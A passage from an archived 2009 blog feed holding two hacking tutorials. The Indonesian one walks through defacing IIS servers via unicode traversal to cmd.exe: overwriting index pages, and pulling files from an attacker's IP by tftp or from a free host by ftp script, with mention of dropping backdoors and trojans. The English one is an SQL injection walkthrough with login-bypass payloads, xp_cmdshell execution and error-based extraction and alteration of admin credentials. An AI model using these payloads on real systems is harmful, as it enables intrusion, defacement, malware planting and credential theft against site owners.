/&gt;&lt;br /&gt;lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe&lt;br /&gt;&lt;br /&gt;sehingga kita dapatkan :&lt;br /&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:jangkrik.exe&lt;br /&gt;&lt;br /&gt;sekarang kamu bisa liat file cmd1.exe udah ada di direktori :&lt;br /&gt;&lt;br /&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:&lt;br /&gt;Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita&lt;br /&gt;&lt;br /&gt;d.) Cari halaman index ke www.target.com/blah.ida&lt;br /&gt;Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.&lt;br /&gt;Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :&lt;br /&gt;&lt;br /&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpub&lt;br /&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwroot&lt;br /&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwrootindex.htm&lt;br /&gt;&lt;br /&gt;sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa&lt;br /&gt;dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya&lt;br /&gt;&lt;br /&gt;e.) kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan&lt;br /&gt;hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :&lt;br /&gt;&lt;br /&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+copy+c:inetpubwwwrootindex.htm+c:inetpubwwwrooti ndex.htm.bak&lt;br /&gt;&lt;br /&gt;f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :&lt;br /&gt;&lt;br /&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+&gt;+c:inetpubwwwrootindex.htm&lt;br /&gt;untuk tidak merusak web nya kita tulis dengan nama file baru&lt;br /&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+&gt;+c:inetpubwwwrootjangkrik.htm&lt;br /&gt;&lt;br /&gt;/c+echo+You%20Were%20Hacked+&gt;+c: &gt;&gt;&gt; adalah untuk menuliskan kata-kata You Were Hacked pada&lt;br /&gt;&lt;br /&gt;c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjangkrik.htm file yang ditulis&lt;br /&gt;&lt;br /&gt;Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini&lt;br /&gt;/c+echo"&lt;br /&gt;This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...&lt;br /&gt;Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda&lt;br /&gt;"+&gt;+c:inepubwwwrootindex.htm&lt;br /&gt;/c+echo"&lt;br /&gt;This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...&lt;br /&gt;Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda&lt;br /&gt;"+&gt;+c:inepubwwwrootjangkrik.htm&lt;br /&gt;keterangan :&lt;br /&gt;%3d adalah pernyataan tanda =&lt;br /&gt;%22 adalah Pernyataan tanda "&lt;br /&gt;%23 adalah pernyataan tanda #&lt;br /&gt;Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga&lt;br /&gt;&lt;br /&gt;g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah 'type' :&lt;br /&gt;&lt;br /&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootindex.htm&lt;br /&gt;http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootjangkrik.htm&lt;br /&gt;Atau liat Langsung aja http://www.target.com/ atau www.target.com/jangkrik.htm&lt;br /&gt;&lt;br /&gt;Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:&lt;br /&gt;&lt;br /&gt;B.) Deface WebSite Dengan Cara tftp&lt;br /&gt;&lt;br /&gt;Deface nya dilakukan dengan meng-upload file lewat TFTP32&lt;br /&gt;Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com ketik keyword nya TFTP32&lt;br /&gt;Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).&lt;br /&gt;Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.&lt;br /&gt;mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :&lt;br /&gt;&lt;br /&gt;a.) Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bug cginya&lt;br /&gt;sehingga kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/&lt;br /&gt;langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )&lt;br /&gt;Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html&lt;br /&gt;&lt;br /&gt;b.)Kita liat lagi apa yg terjadi di IE kita.&lt;br /&gt;&lt;br /&gt;CGI Error&lt;br /&gt;The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :&lt;br /&gt;&lt;br /&gt;Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi&lt;br /&gt;&lt;br /&gt;Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee. Jikalau itu terjadi maka gunakanlah cara pertama di atas tadee.&lt;br /&gt;&lt;br /&gt;C.) Dengan Cara Ftp Dengan Web Kita Yang Telah Kita Isi Dengan Bahan Deface Kita&lt;br /&gt;&lt;br /&gt;Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya&lt;br /&gt;&lt;br /&gt;selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:&lt;br /&gt;&lt;br /&gt;a.) Setelah kita menemukan vulnernya&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:&lt;br /&gt;Directory of c:&lt;br /&gt;10/05/2001 19:56&lt;br /&gt;Programs Files&lt;br /&gt;10/05/2001 19:56&lt;br /&gt;Inetpub&lt;br /&gt;08/05/2001 10:23 230 cmd.exe&lt;br /&gt;24/04/2001 04:33 4.620 1home.htm&lt;br /&gt;05/10/2000 12:40 668 about.htm&lt;br /&gt;10/05/2001 19:54&lt;br /&gt;AboutUs&lt;br /&gt;11/05/2001 10:28 131 about_us.htm&lt;br /&gt;28/10/2000 14:49 4.911 about_us.old.htm&lt;br /&gt;&lt;br /&gt;b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ----&gt;&gt;tujuan nya memendekkan command unicode nya&lt;br /&gt;&lt;br /&gt;c.) Lalu Kita Liat +set nya untuk melihat patch translade nya&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set&lt;br /&gt;&lt;br /&gt;Kira Nya path nya di c:inetpubwwwroot&lt;br /&gt;&lt;br /&gt;d.)Langkah Selanjutnya Yaitu kita membuat script ftp&lt;br /&gt;- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;&lt;br /&gt;Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;&lt;br /&gt;Setelah selesai script tuh kita jalan kan lagi script nya:&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;&lt;br /&gt;buka ie satulagi untuk liat file nya dah smapai belum&lt;br /&gt;http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot&lt;br /&gt;Kalau dah terkirim selamat dah&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Keterangan nya :&lt;br /&gt;Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya&lt;br /&gt;open geocities.com ---&gt;&gt;&gt; scriptnya ---&gt;&gt; +echo+open+geocities.com+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;jangkrik ---&gt;&gt; user name ---&gt;&gt;&gt; scriptnya --&gt;&gt; +echo+jangkrik+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;anuamakang ---&gt;&gt;&gt; password ---&gt;&gt;&gt; scriptnya --&gt;&gt; +echo+anuamakang+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;lcd c:inetpubwwwroot ---&gt;&gt;&gt; folder tujuan ---&gt;&gt;&gt; scriptnya --&gt;&gt;&gt;+echo+lcd+c:inetpubwwwroot+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;ascii ---&gt;&gt;&gt; bentuk file ---&gt;&gt;&gt; scripnya ---&gt;&gt;&gt; +echo+ascii+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;get jangkrik.htm ----&gt;&gt;&gt; command tranfer file ---&gt;&gt;&gt; +echo+get+jangkrik.htm+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;close ---&gt;&gt; perintah dc ke web server ----&gt;&gt;&gt; scripnya ---&gt;&gt;&gt; +echo+close+&gt;&gt;+c:inetpubwwwrootjangkrik.ftp&lt;br /&gt;&lt;br /&gt;hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh..........&lt;br /&gt;&lt;br /&gt;untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4057913628507130739-4623709909160177816?l=stupidsignal.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://stupidsignal.blogspot.com/feeds/4623709909160177816/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4057913628507130739&amp;postID=4623709909160177816' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/4623709909160177816'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/4623709909160177816'/><link rel='alternate' type='text/html' href='http://stupidsignal.blogspot.com/2009/03/deface-from-cmdexe.html' title='DEFACE FROM CMD.EXE'/><author><name>STupID SigNaL</name><uri>http://www.blogger.com/profile/02211733191185843456</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_8X-oMz8K51A/Sbvne1oqRZI/AAAAAAAAAAM/ZBo0MDU82jM/S220/Farel.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4057913628507130739.post-6259028680184418569</id><published>2009-03-14T10:22:00.000-07:00</published><updated>2009-03-14T10:25:36.583-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQL - INJECTION'/><title type='text'>AbouT SQL - INJECTION WALKTROUGH</title><content type='html'>&lt;b&gt;1.1 What is SQL Injection?&lt;/b&gt;&lt;br /&gt;It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1.2 What do you need?&lt;/b&gt;&lt;br /&gt;Any web browser.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2.0 What you should look for?&lt;/b&gt;&lt;br /&gt;Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:&lt;br /&gt;&lt;form action="Search/search.asp" method="post"&gt;&lt;br /&gt;&lt;input type="hidden" name="A" value="C"&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;&lt;br /&gt;Everything between the &lt;form&gt; and &lt;/form&gt; have potential parameters that might be useful (exploit wise).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2.1 What if you can't find any page that takes input?&lt;/b&gt;&lt;br /&gt;You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10&lt;br /&gt;&lt;br /&gt;&lt;b&gt;3.0 How do you test if it is vulnerable?&lt;/b&gt;&lt;br /&gt;Start with a single quote trick. Input something like:&lt;br /&gt;&lt;br /&gt;hi' or 1=1--&lt;br /&gt;&lt;br /&gt;Into login, or password, or even in the URL. Example:&lt;br /&gt; - Login: hi' or 1=1--&lt;br /&gt; - Pass: hi' or 1=1--&lt;br /&gt; - http://duck/index.asp?id=hi' or 1=1--&lt;br /&gt;&lt;br /&gt;If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:&lt;br /&gt;&lt;br /&gt;&lt;form action="http://duck/Search/search.asp" method="post"&gt;&lt;br /&gt;&lt;input type="hidden" name="A" value="hi' or 1=1--"&gt;&lt;br /&gt;&lt;/form&gt;&lt;br /&gt;&lt;br /&gt;If luck is on your side, you will get login without any login name or password.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;3.1 But why ' or 1=1--?&lt;/b&gt;&lt;br /&gt;Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?category=food&lt;br /&gt;&lt;br /&gt;In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):&lt;br /&gt;&lt;br /&gt;v_cat = request("category")&lt;br /&gt;sqlstr="SELECT * FROM product WHERE PCategory='" &amp;amp; v_cat &amp;amp; "'"&lt;br /&gt;set rs=conn.execute(sqlstr)&lt;br /&gt;&lt;br /&gt;As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:&lt;br /&gt;&lt;br /&gt;SELECT * FROM product WHERE PCategory='food'&lt;br /&gt;&lt;br /&gt;The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.&lt;br /&gt;&lt;br /&gt;Now, assume that we change the URL into something like this:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?category=food' or 1=1--&lt;br /&gt;&lt;br /&gt;Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:&lt;br /&gt;&lt;br /&gt;SELECT * FROM product WHERE PCategory='food' or 1=1--'&lt;br /&gt;&lt;br /&gt;The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".&lt;br /&gt;&lt;br /&gt;However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try&lt;br /&gt;&lt;br /&gt;' or 'a'='a&lt;br /&gt;&lt;br /&gt;The SQL query will now become:&lt;br /&gt;&lt;br /&gt;SELECT * FROM product WHERE PCategory='food' or 'a'='a'&lt;br /&gt;&lt;br /&gt;It should return the same result.&lt;br /&gt;&lt;br /&gt;Depending on the actual SQL query, you may have to try some of these possibilities:&lt;br /&gt;&lt;br /&gt;' or 1=1--&lt;br /&gt;" or 1=1--&lt;br /&gt;or 1=1--&lt;br /&gt;' or 'a'='a&lt;br /&gt;" or "a"="a&lt;br /&gt;') or ('a'='a&lt;br /&gt;&lt;br /&gt;&lt;b&gt;4.0 How do I get remote execution with SQL injection?&lt;/b&gt;&lt;br /&gt;Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:&lt;br /&gt;&lt;br /&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;br /&gt;&lt;br /&gt;Try using double quote (") if single quote (') is not working.&lt;br /&gt;&lt;br /&gt;The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:&lt;br /&gt;&lt;br /&gt;#tcpdump icmp&lt;br /&gt;&lt;br /&gt;If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;5.0 How to get output of my SQL query?&lt;/b&gt;&lt;br /&gt;It is possible to use sp_makewebtask to write your query into an HTML:&lt;br /&gt;&lt;br /&gt;'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"&lt;br /&gt;&lt;br /&gt;But the target IP must folder "share" sharing for Everyone.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;6.0 How to get data from the database using ODBC error message&lt;/b&gt;&lt;br /&gt;We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10&lt;br /&gt;&lt;br /&gt;We will try to UNION the integer '10' with another string from the database:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--&lt;br /&gt;&lt;br /&gt;The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:&lt;br /&gt;&lt;br /&gt;SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-&lt;br /&gt;&lt;br /&gt;This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error '80040e07'&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.&lt;br /&gt;/index.asp, line 5&lt;br /&gt;&lt;br /&gt;The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".&lt;br /&gt;&lt;br /&gt;To get the next table name, we can use the following query:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--&lt;br /&gt;&lt;br /&gt;We also can search for data using LIKE keyword:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--&lt;br /&gt;&lt;br /&gt;Output:&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error '80040e07'&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.&lt;br /&gt;/index.asp, line 5&lt;br /&gt;&lt;br /&gt;The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".&lt;br /&gt;&lt;br /&gt;&lt;b&gt;6.1 How to mine all column names of a table?&lt;/b&gt;&lt;br /&gt;We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--&lt;br /&gt;&lt;br /&gt;Output:&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error '80040e07'&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.&lt;br /&gt;/index.asp, line 5&lt;br /&gt;&lt;br /&gt;Now that we have the first column name, we can use NOT IN () to get the next column name:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--&lt;br /&gt;&lt;br /&gt;Output:&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error '80040e07'&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.&lt;br /&gt;/index.asp, line 5&lt;br /&gt;&lt;br /&gt;When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--&lt;br /&gt;&lt;br /&gt;Output:&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error '80040e14'&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.&lt;br /&gt;/index.asp, line 5&lt;br /&gt;&lt;br /&gt;&lt;b&gt;6.2 How to retrieve any data we want?&lt;/b&gt;&lt;br /&gt;Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.&lt;br /&gt;&lt;br /&gt;Now, let's get the first login_name from the "admin_login" table:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--&lt;br /&gt;&lt;br /&gt;Output:&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error '80040e07'&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.&lt;br /&gt;/index.asp, line 5&lt;br /&gt;&lt;br /&gt;We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--&lt;br /&gt;&lt;br /&gt;Output:&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error '80040e07'&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.&lt;br /&gt;/index.asp, line 5&lt;br /&gt;&lt;br /&gt;We can now login as "neo" with his password "m4trix".&lt;br /&gt;&lt;br /&gt;&lt;b&gt;6.3 How to get numeric string value?&lt;/b&gt;&lt;br /&gt;There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--&lt;br /&gt;&lt;br /&gt;We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.&lt;br /&gt;&lt;br /&gt;To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--&lt;br /&gt;&lt;br /&gt;We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error '80040e07'&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.&lt;br /&gt;/index.asp, line 5&lt;br /&gt;&lt;br /&gt;Now, you can even login as 'trinity' with the password '31173'.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;7.0 How to update/insert data into the database?&lt;/b&gt;&lt;br /&gt;When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--&lt;br /&gt;&lt;br /&gt;To INSERT a new record into the database:&lt;br /&gt;&lt;br /&gt;http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--&lt;br /&gt;&lt;br /&gt;We can now login as "neo2" with the password of "newpas5".&lt;br /&gt;&lt;br /&gt;&lt;b&gt;8.0 How to avoid SQL Injection?&lt;/b&gt;&lt;br /&gt;Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:&lt;br /&gt; - Input from users&lt;br /&gt; - Parameters from URL&lt;br /&gt; - Values from cookie&lt;br /&gt;&lt;br /&gt;For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.&lt;br /&gt;&lt;br /&gt;Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.&lt;br /&gt;&lt;br /&gt;Delete stored procedures that you are not using like:&lt;br /&gt;&lt;br /&gt;master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;9.0 Where can I get more info?&lt;/b&gt;&lt;br /&gt;One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.&lt;br /&gt;&lt;a href="http://www.wiretrip.net/rfp/p/doc.asp?id=42&amp;amp;iface=6"&gt;http://www.wiretrip.net/rfp/p/doc.asp?id=42&amp;amp;iface=6&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Great article on gathering information from ODBC error messages:&lt;br /&gt;&lt;a href="http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc"&gt;http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;A good summary of SQL Injection on various SQL Server on&lt;br /&gt;&lt;a href="http://www.owasp.org/asac/input_validation/sql.shtml"&gt;http://www.owasp.org/asac/input_validation/sql.shtml&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Senseport's article on reading SQL Injection:&lt;br /&gt;&lt;a href="http://www.sensepost.com/misc/SQLinsertion.htm"&gt;http://www.sensepost.com/misc/SQLinsertion.htm&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Other worth readings:&lt;br /&gt;&lt;a href="http://www.digitaloffense.net/wargames01/IOWargames.ppt"&gt;http://www.digitaloffense.net/wargames01/IOWargames.ppt&lt;/a&gt;&lt;br /&gt;&lt;a 